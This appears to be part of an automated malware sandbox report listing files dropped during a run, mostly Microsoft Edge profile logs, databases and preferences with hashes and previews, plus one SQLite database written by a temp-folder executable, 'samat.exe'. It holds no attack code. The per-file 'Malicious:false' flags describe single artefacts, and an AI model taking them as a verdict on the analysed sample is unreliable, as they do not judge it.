                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.797744038247885
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:3g2xnQ3cvGIRAjSyesrpsAF4unxA9tLp3X2amEtG1ChqgRF4boQKkOAM4A6:3DQ3cvj6zFGLp2FEkChtKlHOp
                                                                                                                                                                                                                                                                                    MD5:E265042408DF6DE69830D31FD129AE7A
                                                                                                                                                                                                                                                                                    SHA1:AAD970D252DA9C497517A3EE2664E7D1AE0E1272
                                                                                                                                                                                                                                                                                    SHA-256:F45FA601F8E4470C9B289BD7AC4A34BDF86ABFD3FB4F6C27BDEBC81E1BF148CB
                                                                                                                                                                                                                                                                                    SHA-512:B5F7A7C98129086D80197D7F8F19C65DCD605C695A4694A4104A29B640F6201EBA92F9641AACE446AAF93942751DD8E26E760AFE12A50AF9AB9827A8181F5490
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SNSS..........A..............A......"...A..............A..........A..........A..........A....!.....A..................................A...A1..,......A$...66a51c3d_3213_4870_81b0_bdd9db75a25a......A..........A....bF............A...5..0......A&...{98952893-68FF-4A5D-A164-705C709ED3DB}........A..........A.'...'......Z.............A..............A........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x..........r'.....r'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..........................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.089687726927167
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98nwVq2P923oH+Tcwt7Uh2ghZIFUt8YE98aSgZmw+YE98aSIkwO923oH+Tcwts:k98nwVv4YebIhHh2FUt8/98aSg/+/98B
                                                                                                                                                                                                                                                                                    MD5:68032F94F135EBBE8D31992A4B54476B
                                                                                                                                                                                                                                                                                    SHA1:4A9BF0E6B3E8C6676B86E5A57ECDCD6D0C326D60
                                                                                                                                                                                                                                                                                    SHA-256:5F933F5344ACC0ADC4345F4F8BC7DB36DA36F0B8DBEE1F1C39EB934C0432716B
                                                                                                                                                                                                                                                                                    SHA-512:962F9257E1A98E0E6C87272A70D15AB8B5FE5416B9CE31B2D1ADFF9B952DB5AAE49D7F8E8851A6511373D951FE6D5EF94AEFC8D49C9C114D62FABC96048B3D9D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.217 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-16:13:01.218 440 Recovering log #3.2024/11/21-16:13:01.218 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.089687726927167
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98nwVq2P923oH+Tcwt7Uh2ghZIFUt8YE98aSgZmw+YE98aSIkwO923oH+Tcwts:k98nwVv4YebIhHh2FUt8/98aSg/+/98B
                                                                                                                                                                                                                                                                                    MD5:68032F94F135EBBE8D31992A4B54476B
                                                                                                                                                                                                                                                                                    SHA1:4A9BF0E6B3E8C6676B86E5A57ECDCD6D0C326D60
                                                                                                                                                                                                                                                                                    SHA-256:5F933F5344ACC0ADC4345F4F8BC7DB36DA36F0B8DBEE1F1C39EB934C0432716B
                                                                                                                                                                                                                                                                                    SHA-512:962F9257E1A98E0E6C87272A70D15AB8B5FE5416B9CE31B2D1ADFF9B952DB5AAE49D7F8E8851A6511373D951FE6D5EF94AEFC8D49C9C114D62FABC96048B3D9D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.217 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-16:13:01.218 440 Recovering log #3.2024/11/21-16:13:01.218 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.209730881103726
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:k982+v4YebvqBQFUt8/98g1/+/98R3V5LYebvqBvJ:k9m4YebvZg8/969aXLYebvk
                                                                                                                                                                                                                                                                                    MD5:4E16380A8AC6B7B7B54CF94DCE5A1AF0
                                                                                                                                                                                                                                                                                    SHA1:709DAB5134AB2FD7F16CA7E98E8ADF480D7114BF
                                                                                                                                                                                                                                                                                    SHA-256:D58162E468707ECDABA37EC3A593C2B5598D6FAC4D938384DA4387C3CC6DB738
                                                                                                                                                                                                                                                                                    SHA-512:949759DD17B6050658F8F4D317516C7C47DE1D1715CBB3B7D45DD59A73AE014933917B7F0D5D135EE0C3334FBCB0161646504B2264CF330820E4153D8858B9AA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.604 19c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:03.608 19c Recovering log #3.2024/11/21-16:13:03.614 19c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.209730881103726
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:k982+v4YebvqBQFUt8/98g1/+/98R3V5LYebvqBvJ:k9m4YebvZg8/969aXLYebvk
                                                                                                                                                                                                                                                                                    MD5:4E16380A8AC6B7B7B54CF94DCE5A1AF0
                                                                                                                                                                                                                                                                                    SHA1:709DAB5134AB2FD7F16CA7E98E8ADF480D7114BF
                                                                                                                                                                                                                                                                                    SHA-256:D58162E468707ECDABA37EC3A593C2B5598D6FAC4D938384DA4387C3CC6DB738
                                                                                                                                                                                                                                                                                    SHA-512:949759DD17B6050658F8F4D317516C7C47DE1D1715CBB3B7D45DD59A73AE014933917B7F0D5D135EE0C3334FBCB0161646504B2264CF330820E4153D8858B9AA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.604 19c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:03.608 19c Recovering log #3.2024/11/21-16:13:03.614 19c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.125147104868582
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98CwVq2P923oH+TcwtpIFUt8YE98BRVFwgZmw+YE98BRVFwIkwO923oH+Tcwt7:k98CwVv4YebmFUt8/98nYg/+/98nYI5f
                                                                                                                                                                                                                                                                                    MD5:3DE30D8335CCB28F6ECE597B75D414A8
                                                                                                                                                                                                                                                                                    SHA1:410F4CE8CAFB1881D61569D12F0B11BAC49FD097
                                                                                                                                                                                                                                                                                    SHA-256:0414EA4ECD2EA1A54651D46EA919BA09C050CD310A57CE4F26F7A341F71DD1DE
                                                                                                                                                                                                                                                                                    SHA-512:45EF392476BC53C589E0E2FCAFBBB63BE9DE5BFE422D6E240EE5F7910EAD12E395FBA0D433181B692C3A56F587643FEE78DB81C21FF48704C50EFDBF3775B7F9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.229 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-16:13:01.231 440 Recovering log #3.2024/11/21-16:13:01.231 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.125147104868582
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98CwVq2P923oH+TcwtpIFUt8YE98BRVFwgZmw+YE98BRVFwIkwO923oH+Tcwt7:k98CwVv4YebmFUt8/98nYg/+/98nYI5f
                                                                                                                                                                                                                                                                                    MD5:3DE30D8335CCB28F6ECE597B75D414A8
                                                                                                                                                                                                                                                                                    SHA1:410F4CE8CAFB1881D61569D12F0B11BAC49FD097
                                                                                                                                                                                                                                                                                    SHA-256:0414EA4ECD2EA1A54651D46EA919BA09C050CD310A57CE4F26F7A341F71DD1DE
                                                                                                                                                                                                                                                                                    SHA-512:45EF392476BC53C589E0E2FCAFBBB63BE9DE5BFE422D6E240EE5F7910EAD12E395FBA0D433181B692C3A56F587643FEE78DB81C21FF48704C50EFDBF3775B7F9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.229 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-16:13:01.231 440 Recovering log #3.2024/11/21-16:13:01.231 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2650521159351493
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMTSAELyKOMq+8yC8F/YfU5m+OlTLVumQ:Bq+n0JT9ELyKOMq+8y9/Own
                                                                                                                                                                                                                                                                                    MD5:69BCC1A8E4CE7802314FF4B2AF000327
                                                                                                                                                                                                                                                                                    SHA1:169D0E21DADF1B148658AE6A3623C4224EE6A3FB
                                                                                                                                                                                                                                                                                    SHA-256:2C516D1F34ED9D58E6B6E03439F69FCB8EC9B31E114570EBD4241F60C4655DBB
                                                                                                                                                                                                                                                                                    SHA-512:BA20F00E032C82874F4B3D89A4C6E837805F4446B338CDF53D3DE8F345B8934BA03FC5804FE9DA9EE7501CDD1210292EB5490C05322CB7B3FE96A34763408619
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9615
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.117051869036601
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stjykdlAhs1gpsZihUkSs0o8bKbV+F0PQA66WJaFIMYJP3YJ:stjy/hs1gpfh6FKbGMQx6WJaTYO
                                                                                                                                                                                                                                                                                    MD5:DE5BE088A4C9E59227C455C1EF363EAE
                                                                                                                                                                                                                                                                                    SHA1:2407ADB1D1DD4B5DF13FC9342AE9420D5B074197
                                                                                                                                                                                                                                                                                    SHA-256:8D279B7549DCE90272316E340B19ABE809392869901ED832AC959E679492FF0D
                                                                                                                                                                                                                                                                                    SHA-512:FB54DCB2DBE2B1E427587D0A9CFB7CE5D390BE9B406C0018295B60E04FF1872AFBF53C19F1AD81AD0A34EF614E6B57AF559D50D3BD198DE41189C646644C4E90
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376697183230723","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":10090,"left":10000,"maximized":false,"right":10500,"top":10000,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":0,"browser_content_container_width":456,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_lin
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.05389321689687362
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:GtStutf8QYStutf86KR9XCChslotGLNl0ml/Vl/XoQXEl:MtfQtfbKLpEjVl/PvoQ
                                                                                                                                                                                                                                                                                    MD5:8F89827C68BF82BB17F728C778738F9A
                                                                                                                                                                                                                                                                                    SHA1:550816A3C641E8D07AAFB73DA390195EA9C3A82F
                                                                                                                                                                                                                                                                                    SHA-256:29C32786D0FC89E13340F365C63D148B10D88AF390058D9F450A241DCB641426
                                                                                                                                                                                                                                                                                    SHA-512:53BB9A58BB91D970E1CE90D9A87612B3514276BDEEEB73E1D79F1E5B2A3D18D08487B7B1CA52BBE30BA135697C8D2E8F338B7966A67F2B78FD55AF489C9C7240
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:..-.......................%.0....4..}........Q..-.......................%.0....4..}........Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):86552
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8703482269686272
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:ywXzx8I/02TlO+scbX+on9VAKAFXX+hV2VAKAFXX+n8xOqVAKAFXX+vqnUYVAKAN:jjx7/02b2dNshTNsOO5NsvlNsEY8
                                                                                                                                                                                                                                                                                    MD5:FDD982E19A3320D6C898913F3AF07AC0
                                                                                                                                                                                                                                                                                    SHA1:5BB0EBC64E22BAA3284E1059789C07054167FAFB
                                                                                                                                                                                                                                                                                    SHA-256:AD744CB140522D9489AAD9E6EACB39158CC27E67E184F742A0BE4361E69C82FE
                                                                                                                                                                                                                                                                                    SHA-512:E7DF093357B2DE63E83FCD1D5B76BDA7CF81007FF3ED89B564F21F2B7AB10B9E9ACF4F299A6B7E542E99DD3787EFE748966801FDF9285C57265E5958EB35F297
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1775586793808905
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE987Fq2P923oH+TcwtfrK+IFUt8YE98sRNJZmw+YE98sRNDkwO923oH+TcwtfrF:k98hv4Yeb23FUt8/98sLJ/+/98sLD5LR
                                                                                                                                                                                                                                                                                    MD5:39AD3F0413E0D61BB80572FCF1BA9892
                                                                                                                                                                                                                                                                                    SHA1:98692837F3BA48A6ABFA8D9BC2EC4CAAEC9970E5
                                                                                                                                                                                                                                                                                    SHA-256:244016237F011A47741E61BA5E0DB3C66CD3C52B40069FC9BB8EEC1DB6E95A5E
                                                                                                                                                                                                                                                                                    SHA-512:6F40C81EA617672049C63D1F7995C4558990D0E7F2AF78806A52E9EECB53A5A7EA5561A7559FE01F32B9CC7C970C0B9F5BF25FE5A4367D6A4EB3E9826623EA05
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.319 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-16:13:03.320 714 Recovering log #3.2024/11/21-16:13:03.320 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1775586793808905
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE987Fq2P923oH+TcwtfrK+IFUt8YE98sRNJZmw+YE98sRNDkwO923oH+TcwtfrF:k98hv4Yeb23FUt8/98sLJ/+/98sLD5LR
                                                                                                                                                                                                                                                                                    MD5:39AD3F0413E0D61BB80572FCF1BA9892
                                                                                                                                                                                                                                                                                    SHA1:98692837F3BA48A6ABFA8D9BC2EC4CAAEC9970E5
                                                                                                                                                                                                                                                                                    SHA-256:244016237F011A47741E61BA5E0DB3C66CD3C52B40069FC9BB8EEC1DB6E95A5E
                                                                                                                                                                                                                                                                                    SHA-512:6F40C81EA617672049C63D1F7995C4558990D0E7F2AF78806A52E9EECB53A5A7EA5561A7559FE01F32B9CC7C970C0B9F5BF25FE5A4367D6A4EB3E9826623EA05
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.319 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-16:13:03.320 714 Recovering log #3.2024/11/21-16:13:03.320 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                    MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                    SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                    SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                    SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):339
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.173549775034699
